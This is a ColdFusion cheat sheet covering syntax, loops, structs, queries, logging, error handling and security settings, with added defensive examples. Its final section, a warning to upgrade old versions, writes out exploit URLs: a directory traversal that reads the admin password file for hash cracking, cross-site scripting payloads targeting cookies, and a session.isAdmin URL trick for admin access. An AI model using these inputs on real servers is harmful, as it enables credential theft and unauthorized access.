Master CF in no time with these easy-to-remember (and free-to-use) CF cheat codes!
You can open the HTML version on GitHub Pages or browse the code in markdown below.
Use cfset to create a variable (if it doesn't exist) and assign it a value. You can also use it to call functions.
<cfset currentTime = now() />
<cfset name = "Archi" />
<cfset age = 29 />
<cfset todayDate = "Today is: #now()#" />
<cfset greeting = "Hello " & name />
<cfset dataArray = [dateFormat(now(), "short"), dateFormat(dateadd('d',1,now()), "short"), "Me", 42] />
<cfset dictionary = { today = dateFormat(now(), "short"), tomorrow = dateFormat(dateadd('d', 1, now()), "short"), who = "Me", the_answer_to_life_and_everything_else = 42 } />
<cfdump var = "This is a message for you" />
<cfoutput>This is a message for you</cfoutput>
<cfdump var = "#name#" /> _same as inspect in Ruby_
<cfoutput>#name#</cfoutput> _same as puts in Ruby_
There are several different types of for and while loops in ColdFusion. For more info please see the docs for cfloop.
for (i=1;i LTE ArrayLen(array);i=i+1) {
WriteOutput(array[i]);
}
x = 0;
while (x LT 5) {
x = x + 1;
WriteOutput(x);
}
//OUTPUTS 12345
x = 0;
do {
x = x+1;
WriteOutput(x);
} while (x LTE 0);
// OUTPUTS 1
struct = StructNew();
struct.one = "1";
struct.two = "2";
for (key in struct) {
WriteOutput(key);
}
//OUTPUTS onetwo
cars = ["Ford","Dodge"];
for (car in cars) {
WriteOutput(car);
}
//OUTPUTS FordDodge
cars = QueryNew("make,model",
"cf_sql_varchar,cf_sql_varchar",
[["Ford", "T"],["Dodge","30"]]);
for (car in cars) {
WriteOutput("Model " & car.model);
}
//OUTPUTS Model TModel 30
Structs are like dictionaries in Python or hashes in Ruby.
<cfset aGuy = {} />
<cfset batman = {
"first_name" = "Bruno",
"last_name" = "Diaz",
"age" = 42
} />
<cfset aGuy = structNew() />
<cfset aGuy["first_name"] = "Ezequiel" />
<cfset aGuy["last_name"] = "Lopez" />
<cfset todayDate = "Today is: #now()#" />
<cfset greeting = "Hello " & name />
<cfset aGuy.age = 29 />
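<!--- CFML escapes a double quote inside a double-quoted string by doubling it, not with a backslash --->
<cfset aGuy.height = "5' 11""" />
<!--- collection takes the struct itself, so it needs the pound signs --->
<cfloop collection = "#aGuy#" item = "data">
<cfoutput>#aGuy[data]#: #data#</cfoutput>
</cfloop>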
Use SQL in ColdFusion to retrieve data from a database or to enter data into it.
var queryOptions = { datasource: "appMain" };
var data = queryExecute(
"SELECT * FROM users", {}, queryOptions
);
<cfquery name="firstQ" datasource="tsdata.ts24">
SELECT * FROM TestTable
</cfquery>
<cfoutput>
<cfloop query="firstQ">
<p><i>myDataAlfa: </i>#firstQ.myDataAlfa# <i>myDataInt: </i>#firstQ.myDataInt#</p>
</cfloop>
<!--- Extra data to get from the query --->
<p>#firstQ.columnlist#</p>
<p>#firstQ.recordcount#</p>
</cfoutput>
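The queries above take no user input; once a URL or FORM value reaches the SQL, bind it as a parameter and encode the result on output. The following is an added example, not part of the original cheat sheet, that reuses the page's TestTable and tsdata.ts24 datasource; the helper findByInt, the url.id and form.alfa inputs and the secondQ query name are assumptions.

```cfml
<!--- Added example; findByInt, url.id, form.alfa and secondQ are assumptions --->
<cfparam name="url.id" default="">
<cfparam name="form.alfa" default="">

<cfscript>
    // Hypothetical helper: fetch rows whose myDataInt matches a user-supplied value.
    function findByInt( required string rawId ){
        // Validate first, so bad input fails with a clear application error.
        if( !isValid( "integer", arguments.rawId ) ){
            throw( type = "App.InvalidInput", message = "id must be an integer" );
        }
        // The value travels as a typed bind parameter, never as part of the SQL text.
        return queryExecute(
            "SELECT myDataAlfa, myDataInt FROM TestTable WHERE myDataInt = :id",
            { id = { value = arguments.rawId, cfsqltype = "cf_sql_integer" } },
            { datasource = "tsdata.ts24" }
        );
    }
    // Throws App.InvalidInput when id is missing or not an integer.
    rows = findByInt( url.id );
</cfscript>

<!--- Tag form: cfqueryparam does the same binding inside cfquery --->
<cfquery name="secondQ" datasource="tsdata.ts24">
    SELECT myDataAlfa, myDataInt
    FROM TestTable
    WHERE myDataAlfa = <cfqueryparam value="#form.alfa#" cfsqltype="cf_sql_varchar" maxlength="50">
</cfquery>

<!--- Database values are untrusted on the way out too: encode for the HTML context --->
<cfoutput>
    <cfloop query="rows">
        <p><i>myDataAlfa: </i>#encodeForHTML( rows.myDataAlfa )# <i>myDataInt: </i>#encodeForHTML( rows.myDataInt )#</p>
    </cfloop>
    <p>#secondQ.recordcount# row(s) matched the second query</p>
</cfoutput>
```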
Use cflog to write a message to a log file.
<cflog file="myAppLog" application="no"
text="User #Form.username# logged on.">
var logDir = expandPath( "/logs/" );
var logs = directoryList(
path = logDir,
listInfo = "name",
filter = "*.log",
type = "file",
recurse = "false"
);
for( var log in logs ){
var fullPath = logDir & log ;
if( fileExists( fullPath ) ){
fileDelete( fullPath );
}
}
component {
    // ...
    function onError( exception ){
        // Logging error with LogBox...
        // (logger is assumed to be a LogBox logger obtained elsewhere in the component)
        writeOutput( "Writing to error log.." );
        logger.error(
            "Error occurred in application: #exception.message# #exception.detail#",
            exception
        );
        // error page
        include "views/error.cfm";
    }
}
Security-related settings for Application.cfc file
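// Application.cfc
component {
    this.name = "myApp";
    // Block every file extension for uploads
    this.blockedExtForFileUpload = "*";
    // Filter script tags in all input scopes (a pattern filter, not a replacement for output encoding)
    this.scriptProtect = "all";
    // Hide the session cookie from JavaScript and send it over HTTPS only
    this.sessioncookie = {
        httpOnly: true,
        secure : true
    };
}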
ColdFusion provides a variety of tools to customize error information and handle errors when they occur.
try {
throw(message="Oops", detail="xyz");
} catch (any e) {
WriteOutput("Error: " & e.message);
rethrow;
} finally {
WriteOutput("I run even if no error");
}
public function onError(required exception, required string eventName)
{
var factory = new App.ExceptionFactory();
var e = factory.getNewException(arguments.eventName, arguments.exception);
if (e.logError()) {
/** we could also have a logging cfc etc **/
var loggingFile = new App.SomeLoggingCfc(arguments.eventName, arguments.exception);
loggingFile.commitLog();
}
if (e.debugError()) {}
e.throwException();
}
public ExceptionFactory function getNewException(required string eventName, required exception)
{
return new "App.#exception.type#"(argumentCollection = arguments);
}
public boolean function logError() {}
public boolean function debugError() {}
public function throwException() {}
You can use CFML tags and functions to display or hide debugging and tracing information.
<cfsetting showDebugOutput="No">
<cfquery name="TestQuery" datasource="cfexample" debug>
SELECT * FROM TestTable
</cfquery>
<cfif IsDebugMode()>
<cflog file="MyAppSilentTrace" text="Page: #cgi.script_name#,
completed query MyDBQuery; Query Execution time:
#cfquery.ExecutionTime# Status: #Application.status#">
</cfif>
ColdFusion comments have a similar format to HTML comments but use three dash characters instead of two.
<!--- This is a ColdFusion Comment. Browsers do not receive it. --->
mojo = 1; //THIS IS A COMMENT
/* This is a comment
that can span
multiple lines
*/
ColdFusion had a lot of security vulnerabilities in the past, so stop using older versions!
Detailed information about the exploitation of this vulnerability: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
- open file in browser
http://[server:port]/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
- copy the hashed password
#Fri Feb 07 05:48:45 PST 2020
rdspassword=
password=42DABCDFADADASASAS4891539FASDA11CA5
encrypted=true
- compare with rainbow tables
https://www.dcode.fr/sha1-hash
Detailed information about the exploitation of this vulnerability: https://www.securityfocus.com/bid/36046/info-directory-traversal-faq-cve-2010-2861/
- open file in browser
http://www.example.com:8500/CFIDE/componentutils/componentdetail.cfm?component=<body%20onload=alert(document.cookie)>
http://www.example.com:8500/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://www.example.com:8500/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E
Detailed information about the exploitation of this vulnerability: https://www.petefreitag.com/item/834.cfm
- open any action (that checks session.isAdmin) in browser
http://www.example.com:8500/CFIDE/componentutils/componentdetail.cfm
- append the following to the url
?session.isAdmin=1
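One way to close off the `?session.isAdmin=1` trick described above, as an added example that is not part of the original cheat sheet: turn off implicit scope searching, define the flag for every session, and test it explicitly in the session scope. The isAdminSession helper, the /admin/ path prefix and the myAppLog log name are assumptions.

```cfml
// Application.cfc (added example; helper name, path prefix and log name are assumptions)
component {
    this.name = "myApp";
    this.sessionManagement = true;
    // Do not fall back to URL, FORM, COOKIE etc. when a variable is not found.
    this.searchImplicitScopes = false;

    function onSessionStart(){
        // Define the flag for every session so a lookup never has to search elsewhere.
        session.isAdmin = false;
    }

    // Hypothetical guard: true only for a real boolean stored server-side in the session.
    boolean function isAdminSession(){
        return structKeyExists( session, "isAdmin" )
            && isBoolean( session.isAdmin )
            && session.isAdmin;
    }

    function onRequestStart( required string targetPage ){
        // Hypothetical admin area prefix.
        if( left( arguments.targetPage, 7 ) == "/admin/" && !isAdminSession() ){
            // Note whether the request carried a parameter named like a session variable.
            var dottedParam = false;
            for( var k in url ){
                if( left( k, 8 ) == "session." ){
                    dottedParam = true;
                }
            }
            writeLog(
                file = "myAppLog",
                type = "warning",
                text = "Admin access denied; session-style URL parameter present: #dottedParam#"
            );
            cfheader( statuscode = 403 );
            abort;
        }
        return true;
    }
}
```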